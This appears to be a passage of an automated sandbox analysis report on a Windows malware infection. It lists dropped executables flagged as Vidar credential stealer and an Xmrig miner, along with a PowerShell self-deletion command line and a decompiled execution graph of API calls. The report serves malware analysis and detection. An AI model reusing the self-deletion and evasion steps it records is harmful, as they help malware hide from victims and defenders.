                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002C.00000002.3802571549.00000000006AD000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000002C.00000002.3802571549.00000000005D1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002C.00000002.3802571549.00000000005D1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000002C.00000003.3133557173.0000000001937000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000002C.00000003.3134030168.0000000004489000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:45
                                                                                                                                                                                                                                                                          Start time:19:14:29
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:choice /d y /t 5
                                                                                                                                                                                                                                                                          Imagebase:0x650000
                                                                                                                                                                                                                                                                          File size:28'160 bytes
                                                                                                                                                                                                                                                                          MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:46
                                                                                                                                                                                                                                                                          Start time:19:14:32
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exe"
                                                                                                                                                                                                                                                                          Imagebase:0x130000
                                                                                                                                                                                                                                                                          File size:1'863'680 bytes
                                                                                                                                                                                                                                                                          MD5 hash:27C1F96D7E1B72B6817B6EFEFF037F90
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                          • Detection: 58%, ReversingLabs
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:47
                                                                                                                                                                                                                                                                          Start time:19:14:39
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exe"
                                                                                                                                                                                                                                                                          Imagebase:0x9a0000
                                                                                                                                                                                                                                                                          File size:776'832 bytes
                                                                                                                                                                                                                                                                          MD5 hash:AFD936E441BF5CBDB858E96833CC6ED3
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                                          • Detection: 68%, ReversingLabs
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:48
                                                                                                                                                                                                                                                                          Start time:19:14:39
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:49
                                                                                                                                                                                                                                                                          Start time:19:14:42
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exe"
                                                                                                                                                                                                                                                                          Imagebase:0x9a0000
                                                                                                                                                                                                                                                                          File size:776'832 bytes
                                                                                                                                                                                                                                                                          MD5 hash:AFD936E441BF5CBDB858E96833CC6ED3
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000031.00000003.3228675328.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:50
                                                                                                                                                                                                                                                                          Start time:19:14:52
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exe"
                                                                                                                                                                                                                                                                          Imagebase:0x680000
                                                                                                                                                                                                                                                                          File size:4'453'888 bytes
                                                                                                                                                                                                                                                                          MD5 hash:202E966732FE7168248CEB69D8D41B48
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                          • Detection: 39%, ReversingLabs
                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:51
                                                                                                                                                                                                                                                                          Start time:19:14:59
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exe"
                                                                                                                                                                                                                                                                          Imagebase:0xd30000
                                                                                                                                                                                                                                                                          File size:1'374'720 bytes
                                                                                                                                                                                                                                                                          MD5 hash:669ED3665495A4A52029FF680EC8EBA9
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                                          • Detection: 28%, ReversingLabs
                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:52
                                                                                                                                                                                                                                                                          Start time:19:15:01
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                                                                                          Imagebase:0x7ff6f8290000
                                                                                                                                                                                                                                                                          File size:1'827'328 bytes
                                                                                                                                                                                                                                                                          MD5 hash:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000034.00000003.3278299159.000001A628D70000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000034.00000003.3278299159.000001A628D70000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                                                          • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 00000034.00000003.3278299159.000001A628D70000.00000004.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:53
                                                                                                                                                                                                                                                                          Start time:19:15:01
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:explorer.exe
                                                                                                                                                                                                                                                                          Imagebase:0x7ff674740000
                                                                                                                                                                                                                                                                          File size:5'141'208 bytes
                                                                                                                                                                                                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000002.3284448513.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000002.3284564617.000000014040B000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000002.3283875362.0000000000F9D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000002.3283875362.0000000000F77000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:54
                                                                                                                                                                                                                                                                          Start time:19:15:01
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                                                                                          Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:55
                                                                                                                                                                                                                                                                          Start time:19:15:01
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                          Disassembly

                                                                                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                                            Execution Coverage:4.5%
                                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                            Signature Coverage:4%
                                                                                                                                                                                                                                                                            Total number of Nodes:770
                                                                                                                                                                                                                                                                            Total number of Limit Nodes:16
                                                                                                                                                                                                                                                                            execution_graph 13117 6d0c7 13118 6d0d7 13117->13118 13119 6d17f 13118->13119 13120 6d17b RtlWakeAllConditionVariable 13118->13120 13447 59f44 13448 59f4c shared_ptr 13447->13448 13449 5a953 Sleep CreateMutexA 13448->13449 13450 5a01f shared_ptr 13448->13450 13451 5a98e 13449->13451 12948 53c47 12949 53c51 12948->12949 12952 53c5f 12949->12952 12955 532d0 12949->12955 12950 53c68 12952->12950 12974 53810 12952->12974 12978 6c6ac 12955->12978 12957 5336b 12984 6c26a 12957->12984 12959 5333c __Mtx_unlock 12961 6c26a 5 API calls 12959->12961 12964 53350 std::future_error::future_error 12959->12964 12962 53377 12961->12962 12965 6c6ac GetSystemTimePreciseAsFileTime 12962->12965 12963 53314 12963->12957 12963->12959 12981 6bd4c 12963->12981 12964->12952 12966 533af 12965->12966 12967 6c26a 5 API calls 12966->12967 12968 533b6 __Cnd_broadcast 12966->12968 12967->12968 12969 6c26a 5 API calls 12968->12969 12970 533d7 __Mtx_unlock 12968->12970 12969->12970 12971 6c26a 5 API calls 12970->12971 12972 533eb 12970->12972 12973 5340e 12971->12973 12972->12952 12973->12952 12975 5381c 12974->12975 13029 52440 12975->13029 12988 6c452 12978->12988 12980 6c6b9 12980->12963 13005 6bb72 12981->13005 12983 6bd5c 12983->12963 12985 6c292 12984->12985 12986 6c274 12984->12986 12985->12985 12986->12985 13011 6c297 12986->13011 12989 6c4a8 12988->12989 12991 6c47a std::future_error::future_error 12988->12991 12989->12991 12994 6cf6b 12989->12994 12991->12980 12992 6c4fd __Xtime_diff_to_millis2 12992->12991 12993 6cf6b _xtime_get GetSystemTimePreciseAsFileTime 12992->12993 12993->12992 12995 6cf7a 12994->12995 12997 6cf87 __aulldvrm 12994->12997 12995->12997 12998 6cf44 12995->12998 12997->12992 13001 6cbea 12998->13001 13002 6cc07 13001->13002 13003 6cbfb GetSystemTimePreciseAsFileTime 13001->13003 13002->12997 13003->13002 13006 6bb9c 13005->13006 13007 6cf6b _xtime_get GetSystemTimePreciseAsFileTime 13006->13007 13009 6bba4 __Xtime_diff_to_millis2 std::future_error::future_error 13006->13009 13008 6bbcf __Xtime_diff_to_millis2 13007->13008 13008->13009 13010 6cf6b _xtime_get GetSystemTimePreciseAsFileTime 13008->13010 13009->12983 13010->13009 13014 52ae0 13011->13014 13013 6c2ae std::_Throw_future_error 13022 6bedf 13014->13022 13016 52aff 13016->13013 13017 52af4 __cftof 13017->13016 13018 8a671 __cftof 4 API calls 13017->13018 13021 86ccc 13018->13021 13019 88bec __cftof 4 API calls 13020 86cf6 13019->13020 13021->13019 13025 6cc31 13022->13025 13026 6cc3f InitOnceExecuteOnce 13025->13026 13028 6bef2 13025->13028 13026->13028 13028->13017 13032 6b5d6 13029->13032 13031 52472 13033 6b5f1 std::_Throw_future_error 13032->13033 13034 88bec __cftof 4 API calls 13033->13034 13036 6b658 __cftof std::future_error::future_error 13033->13036 13035 6b69f 13034->13035 13036->13031 12884 58780 12885 58786 12884->12885 12891 86729 12885->12891 12888 587a6 12890 587a0 12898 86672 12891->12898 12893 58793 12893->12888 12894 867b7 12893->12894 12895 867c3 __cftof 12894->12895 12897 867cd __cftof 12895->12897 12910 86740 12895->12910 12897->12890 12899 8667e __cftof 12898->12899 12901 86685 __cftof 12899->12901 12902 8a8c3 12899->12902 12901->12893 12903 8a8cf __cftof 12902->12903 12906 8a967 12903->12906 12905 8a8ea 12905->12901 12907 8a98a 12906->12907 12908 8d82f __cftof RtlAllocateHeap 12907->12908 12909 8a9d0 __freea 12907->12909 12908->12909 12909->12905 12911 8674d __cftof __freea 12910->12911 12912 86762 12910->12912 12911->12897 12912->12911 12914 8a038 12912->12914 12915 8a075 12914->12915 12916 8a050 12914->12916 12915->12911 12916->12915 12918 90439 12916->12918 12919 90445 __cftof 12918->12919 12921 9044d __cftof __dosmaperr 12919->12921 12922 9052b 12919->12922 12921->12915 12923 9054d 12922->12923 12924 90551 __cftof __dosmaperr 12922->12924 12923->12924 12928 900d2 12923->12928 12924->12921 12929 900e3 12928->12929 12930 8a671 __cftof 4 API calls 12929->12930 12931 90106 12929->12931 12930->12931 12931->12924 12932 8fcc0 12931->12932 12933 8fd0d 12932->12933 12934 8690a __cftof 4 API calls 12933->12934 12938 8fd1c __cftof 12934->12938 12935 8ffbc std::future_error::future_error 12935->12924 12936 8b67d 4 API calls 12936->12938 12937 8c719 GetPEB ExitProcess GetPEB RtlAllocateHeap __fassign 12937->12938 12938->12935 12938->12936 12938->12937 13121 520c0 13122 6c68b __Mtx_init_in_situ 2 API calls 13121->13122 13123 520cc 13122->13123 13124 5e0c0 recv 13125 5e122 recv 13124->13125 13126 5e157 recv 13125->13126 13127 5e191 13126->13127 13128 5e2b3 std::future_error::future_error 13127->13128 13129 6c6ac GetSystemTimePreciseAsFileTime 13127->13129 13130 5e2ee 13129->13130 13131 6c26a 5 API calls 13130->13131 13132 5e358 13131->13132 13210 58980 13212 589d8 shared_ptr 13210->13212 13213 58aea 13210->13213 13211 55c10 6 API calls 13211->13212 13212->13211 13212->13213 13244 52e00 13245 52e28 13244->13245 13246 6c68b __Mtx_init_in_situ 2 API calls 13245->13246 13247 52e33 13246->13247 13042 53c8e 13043 53c98 13042->13043 13044 53ca5 13043->13044 13050 52410 13043->13050 13046 53810 4 API calls 13044->13046 13047 53ccf 13044->13047 13046->13047 13048 53810 4 API calls 13047->13048 13049 53cdb 13048->13049 13051 52424 13050->13051 13054 6b52d 13051->13054 13062 83aed 13054->13062 13056 5242a 13056->13044 13057 6b5a5 ___std_exception_copy 13069 6b1ad 13057->13069 13059 6b598 13065 6af56 13059->13065 13073 84f29 13062->13073 13064 6b555 13064->13056 13064->13057 13064->13059 13066 6af9f ___std_exception_copy 13065->13066 13068 6afb2 shared_ptr 13066->13068 13079 6b39f 13066->13079 13068->13056 13070 6b1d8 13069->13070 13072 6b1e1 shared_ptr 13069->13072 13071 6b39f 5 API calls 13070->13071 13071->13072 13072->13056 13074 84f2e __cftof 13073->13074 13074->13064 13075 8d634 __cftof 4 API calls 13074->13075 13078 88bfc __cftof 13074->13078 13075->13078 13076 865ed __cftof 3 API calls 13077 88c2f 13076->13077 13078->13076 13080 6bedf InitOnceExecuteOnce 13079->13080 13081 6b3e1 13080->13081 13082 6b3e8 13081->13082 13090 86cbb 13081->13090 13082->13068 13091 86cc7 __cftof 13090->13091 13092 8a671 __cftof 4 API calls 13091->13092 13095 86ccc 13092->13095 13093 88bec __cftof 4 API calls 13094 86cf6 13093->13094 13095->13093 13248 86a44 13249 86a5c 13248->13249 13250 86a52 13248->13250 13253 8698d 13249->13253 13252 86a76 __freea 13254 8690a __cftof 4 API calls 13253->13254 13255 8699f 13254->13255 13255->13252 12685 5a856 12686 5a870 12685->12686 12687 5a892 shared_ptr 12685->12687 12686->12687 12689 5a94e 12686->12689 12691 5a8a0 12687->12691 12701 57d30 12687->12701 12692 5a953 Sleep CreateMutexA 12689->12692 12690 5a8ae 12690->12691 12693 57d30 7 API calls 12690->12693 12695 5a98e 12692->12695 12694 5a8b8 12693->12694 12694->12691 12696 57d30 7 API calls 12694->12696 12697 5a8c2 12696->12697 12697->12691 12698 57d30 7 API calls 12697->12698 12699 5a8cc 12698->12699 12699->12691 12700 57d30 7 API calls 12699->12700 12700->12691 12702 57d96 __cftof 12701->12702 12721 57ee8 shared_ptr std::future_error::future_error 12702->12721 12740 55c10 12702->12740 12704 57dd2 12705 55c10 6 API calls 12704->12705 12707 57dff shared_ptr 12705->12707 12706 57ed3 GetNativeSystemInfo 12708 57ed7 12706->12708 12707->12706 12707->12708 12707->12721 12709 57f3f 12708->12709 12710 58019 12708->12710 12708->12721 12711 55c10 6 API calls 12709->12711 12712 55c10 6 API calls 12710->12712 12714 57f67 12711->12714 12713 5804c 12712->12713 12715 55c10 6 API calls 12713->12715 12716 55c10 6 API calls 12714->12716 12718 5806b 12715->12718 12717 57f86 12716->12717 12750 88bbe 12717->12750 12720 55c10 6 API calls 12718->12720 12722 580a3 12720->12722 12721->12690 12723 55c10 6 API calls 12722->12723 12724 580f4 12723->12724 12725 55c10 6 API calls 12724->12725 12726 58113 12725->12726 12727 55c10 6 API calls 12726->12727 12728 5814b 12727->12728 12729 55c10 6 API calls 12728->12729 12730 5819c 12729->12730 12731 55c10 6 API calls 12730->12731 12732 581bb 12731->12732 12733 55c10 6 API calls 12732->12733 12734 581f3 12733->12734 12735 55c10 6 API calls 12734->12735 12736 58244 12735->12736 12737 55c10 6 API calls 12736->12737 12738 58263 12737->12738 12739 55c10 6 API calls 12738->12739 12739->12721 12741 55c54 12740->12741 12753 54b30 12741->12753 12743 55d17 shared_ptr std::future_error::future_error 12743->12704 12744 55c7b __cftof 12744->12743 12745 55da7 RegOpenKeyExA 12744->12745 12746 55e00 RegCloseKey 12745->12746 12748 55e26 12746->12748 12747 55ea6 shared_ptr std::future_error::future_error 12747->12704 12748->12747 12749 55c10 4 API calls 12748->12749 12874 88868 12750->12874 12752 88bdc 12752->12721 12755 54ce5 12753->12755 12756 54b92 12753->12756 12755->12744 12756->12755 12757 86da6 12756->12757 12758 86db4 12757->12758 12761 86dc2 __fassign 12757->12761 12762 86d19 12758->12762 12761->12756 12767 8690a 12762->12767 12766 86d3d 12766->12756 12768 8692a 12767->12768 12769 86921 12767->12769 12768->12769 12781 8a671 12768->12781 12775 86d52 12769->12775 12776 86d8f 12775->12776 12777 86d5f 12775->12777 12866 8b67d 12776->12866 12780 86d6e __fassign 12777->12780 12861 8b6a1 12777->12861 12780->12766 12782 8a67b __cftof 12781->12782 12784 8a694 __cftof __freea 12782->12784 12796 8d82f 12782->12796 12785 8694a 12784->12785 12800 88bec 12784->12800 12788 8b5fb 12785->12788 12789 8b60e 12788->12789 12790 86960 12788->12790 12789->12790 12826 8f5ab 12789->12826 12792 8b628 12790->12792 12793 8b63b 12792->12793 12794 8b650 12792->12794 12793->12794 12833 8e6b1 12793->12833 12794->12769 12797 8d83c __cftof 12796->12797 12798 8d867 RtlAllocateHeap 12797->12798 12799 8d87a 12797->12799 12798->12797 12798->12799 12799->12784 12801 88bf1 __cftof 12800->12801 12805 88bfc __cftof 12801->12805 12806 8d634 12801->12806 12820 865ed 12805->12820 12807 8d640 __cftof 12806->12807 12808 8d81b __cftof 12807->12808 12809 8d726 12807->12809 12811 8d751 __cftof 12807->12811 12819 8d69c __cftof 12807->12819 12810 865ed __cftof 3 API calls 12808->12810 12809->12811 12823 8d62b 12809->12823 12813 8d82e 12810->12813 12815 8a671 __cftof 4 API calls 12811->12815 12817 8d7a5 12811->12817 12811->12819 12815->12817 12816 8d62b __cftof 4 API calls 12816->12811 12818 8a671 __cftof 4 API calls 12817->12818 12817->12819 12818->12819 12819->12805 12821 864c7 __cftof 3 API calls 12820->12821 12822 865fe 12821->12822 12824 8a671 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12823->12824 12825 8d630 12824->12825 12825->12816 12827 8f5b7 __cftof 12826->12827 12828 8a671 __cftof 4 API calls 12827->12828 12830 8f5c0 __cftof 12828->12830 12829 8f606 12829->12790 12830->12829 12831 88bec __cftof 4 API calls 12830->12831 12832 8f62b 12831->12832 12834 8a671 __cftof 4 API calls 12833->12834 12835 8e6bb 12834->12835 12838 8e5c9 12835->12838 12837 8e6c1 12837->12794 12839 8e5d5 __cftof __freea 12838->12839 12840 8e5f6 12839->12840 12841 88bec __cftof 4 API calls 12839->12841 12840->12837 12842 8e668 12841->12842 12843 8e6a4 12842->12843 12847 8a72e 12842->12847 12843->12837 12848 8a739 __cftof 12847->12848 12849 8d82f __cftof RtlAllocateHeap 12848->12849 12853 8a745 __cftof __freea 12848->12853 12849->12853 12850 88bec __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12851 8a7c7 12850->12851 12852 8a7be 12854 8e4b0 12852->12854 12853->12850 12853->12852 12855 8e5c9 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12854->12855 12856 8e4c3 12855->12856 12857 8e259 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12856->12857 12858 8e4cb __cftof 12857->12858 12859 8e6c4 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12858->12859 12860 8e4dc __cftof __freea 12858->12860 12859->12860 12860->12843 12862 8690a __cftof 4 API calls 12861->12862 12863 8b6be 12862->12863 12865 8b6ce std::future_error::future_error 12863->12865 12871 8f1bf 12863->12871 12865->12780 12867 8a671 __cftof 4 API calls 12866->12867 12868 8b688 12867->12868 12869 8b5fb __cftof 4 API calls 12868->12869 12870 8b698 12869->12870 12870->12780 12872 8690a __cftof 4 API calls 12871->12872 12873 8f1df __cftof __fassign __freea std::future_error::future_error 12872->12873 12873->12865 12875 8887a 12874->12875 12876 8690a __cftof 4 API calls 12875->12876 12879 8888f __cftof 12875->12879 12878 888bf 12876->12878 12877 86d52 4 API calls 12877->12878 12878->12877 12878->12879 12879->12752 13311 52b10 13312 52b1c 13311->13312 13313 52b1a 13311->13313 13314 6c26a 5 API calls 13312->13314 13315 52b22 13314->13315 13457 52b90 13458 52bce 13457->13458 13459 6b7fb TpReleaseWork 13458->13459 13460 52bdb shared_ptr std::future_error::future_error 13459->13460 13541 687d0 13542 6882a __cftof 13541->13542 13548 69bb0 13542->13548 13545 6886c std::future_error::future_error 13547 688d9 std::_Throw_future_error 13561 69ef0 13548->13561 13550 69be5 13565 52ce0 13550->13565 13552 69c16 13574 69f70 13552->13574 13554 68854 13554->13545 13555 543f0 13554->13555 13556 6bedf InitOnceExecuteOnce 13555->13556 13557 5440a 13556->13557 13558 54411 13557->13558 13559 86cbb 4 API calls 13557->13559 13558->13547 13560 54424 13559->13560 13562 69f0c 13561->13562 13563 6c68b __Mtx_init_in_situ 2 API calls 13562->13563 13564 69f17 13563->13564 13564->13550 13566 52d1d 13565->13566 13567 6bedf InitOnceExecuteOnce 13566->13567 13568 52d46 13567->13568 13569 52d88 13568->13569 13570 52d51 std::future_error::future_error 13568->13570 13579 6bef7 13568->13579 13572 52440 4 API calls 13569->13572 13570->13552 13573 52d9b 13572->13573 13573->13552 13575 69fef shared_ptr 13574->13575 13577 6a058 13575->13577 13592 6a210 13575->13592 13578 6a03b 13578->13554 13580 6bf03 std::_Throw_future_error 13579->13580 13581 6bf73 13580->13581 13582 6bf6a 13580->13582 13584 52ae0 5 API calls 13581->13584 13586 6be7f 13582->13586 13585 6bf6f 13584->13585 13585->13569 13587 6cc31 InitOnceExecuteOnce 13586->13587 13588 6be97 13587->13588 13589 6be9e 13588->13589 13590 86cbb 4 API calls 13588->13590 13589->13585 13591 6bea7 13590->13591 13591->13585 13593 6a290 13592->13593 13599 671d0 13593->13599 13595 6a2cc shared_ptr 13596 6a4be shared_ptr 13595->13596 13597 53ee0 3 API calls 13595->13597 13596->13578 13598 6a4a6 13597->13598 13598->13578 13600 67211 13599->13600 13607 53970 13600->13607 13602 67446 std::future_error::future_error 13602->13595 13603 672ad __cftof 13603->13602 13604 6c68b __Mtx_init_in_situ 2 API calls 13603->13604 13605 67401 13604->13605 13612 52ec0 13605->13612 13608 6c68b __Mtx_init_in_situ 2 API calls 13607->13608 13609 539a7 13608->13609 13610 6c68b __Mtx_init_in_situ 2 API calls 13609->13610 13611 539e6 13610->13611 13611->13603 13613 52f06 13612->13613 13614 52f7e GetCurrentThreadId 13612->13614 13617 6c6ac GetSystemTimePreciseAsFileTime 13613->13617 13615 52f94 13614->13615 13616 52fef 13614->13616 13615->13616 13622 6c6ac GetSystemTimePreciseAsFileTime 13615->13622 13616->13602 13618 52f12 13617->13618 13619 5301e 